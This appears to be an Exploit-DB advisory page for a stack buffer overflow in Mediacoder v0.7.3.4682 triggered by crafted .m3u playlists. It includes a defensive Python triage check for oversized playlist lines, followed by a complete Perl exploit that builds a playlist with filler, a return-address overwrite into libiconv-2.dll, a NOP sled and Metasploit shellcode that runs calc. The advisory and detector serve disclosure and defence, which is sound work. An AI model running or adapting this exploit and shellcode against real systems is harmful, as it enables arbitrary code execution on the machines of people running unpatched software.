Vendor: Mediacoder
By: s-dz
CVSS: 9.3 (HIGH)
Type: Buffer Overflow
CWE: 119
Product Name: Mediacoder
Affected Version From: v0.7.3.4682
Affected Version To: v0.7.3.4682
Patch Exists: YES
Related CWE: N/A
CPE: a:mediacoder:mediacoder
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP 2 (FR)
2010

Mediacoder v0.7.3.4682 (.m3u) File Universal Buffer Overflow Exploit

Mediacoder v0.7.3.4682 is vulnerable to a stack-based buffer overflow when processing specially crafted .m3u files. The cause is a boundary error in the .m3u handling: an overly long string in the first line of the file overflows a stack buffer. An attacker who supplies such a file can exploit this to execute arbitrary code on the vulnerable system.

Mitigation:

Upgrade to the latest version of Mediacoder; v0.7.3.4682 is the affected release.
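A triage check for the condition described above (an overly long first line in a .m3u file), added here as an example and not part of the original advisory or of Mediacoder. The 256-byte threshold, the function name `triage_m3u` and both sample playlists are assumptions constructed for illustration.

```python
import re

# Assumption: the page's PoC pads with 256 bytes before the overwritten return
# address, so an entry of that length or more is treated as suspect.
SUSPECT_LEN = 256
NOP_RUN = re.compile(rb"\x90{8,}")  # run of x86 NOP bytes, not playlist text


def triage_m3u(data, suspect_len=SUSPECT_LEN):
    """Return a list of (line_number, reason) findings for raw playlist bytes."""
    findings = []
    if data.startswith(b"\xef\xbb\xbf"):  # drop a UTF-8 byte-order mark
        data = data[3:]
    for num, line in enumerate(re.split(rb"\r\n|\r|\n", data), start=1):
        if len(line) >= suspect_len:
            findings.append((num, "entry is %d bytes long" % len(line)))
        if NOP_RUN.search(line):
            findings.append((num, "run of 0x90 bytes"))
        # Tab is tolerated; any other control byte has no place in a playlist.
        if any(b < 0x20 and b != 0x09 for b in line):
            findings.append((num, "control bytes in entry"))
    return findings


# Constructed samples (not taken from the page): a normal playlist, and a
# single oversized first line with the same layout as the PoC but inert
# placeholder bytes where the return address and payload would be.
BENIGN = b"#EXTM3U\r\n#EXTINF:215,Artist - Title\r\nC:\\Music\\track01.mp3\r\n"
OVERSIZED = b"A" * 256 + b"BBBB" + b"\x90" * 24 + b"\xcc" * 16

if __name__ == "__main__":
    for name, blob in (("benign", BENIGN), ("oversized", OVERSIZED)):
        print(name, triage_m3u(blob) or "clean")
```

Long URLs in streaming playlists can exceed the threshold, so treat a length-only finding as a prompt to inspect the file, not as a verdict.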

Exploit-DB raw data:

#!/usr/bin/perl
###################################################################
# Exploit Title : Mediacoder v0.7.3.4682 (.m3u) File Universal Buffer Overflow Exploit
# tested on windows xp SP 2 (FR)
# Date: 24/07/2010
# download : http://www.dodownload.com/video+multimedia/play+video/mediacoder.html
# Author: s-dz [s-dz[at]HotmaiL.fr]
# Always mahboul-3lik  ;)
###################################################################

my $file = "mahboul-3lik.m3u";      # playlist written by this script

my $junk = "\x41" x 256;            # filler up to the saved return address
my $eip = pack('V', 0x66086687);    # return address overwrite, inside libiconv-2.dll
my $nop = "\x90" x 24;              # NOP padding ahead of the payload

# windows/exec
# http://www.metasploit.com
# EXITFUNC=thread, CMD=calc
my $sec =

"\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1" . 

"\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30" . 

"\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" . 

"\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" . 

"\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b" . 

"\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a" . 

"\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" . 

"\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98" . 

"\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" . 

"\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05" . 

"\x7f\xe8\x7b\xca"; 



# Write the crafted playlist as a single line.
open(my $FILE, '>', $file) or die "cannot open $file: $!";
print($FILE $junk.$eip.$nop.$sec);
close($FILE);
print("exploit created successfully\n");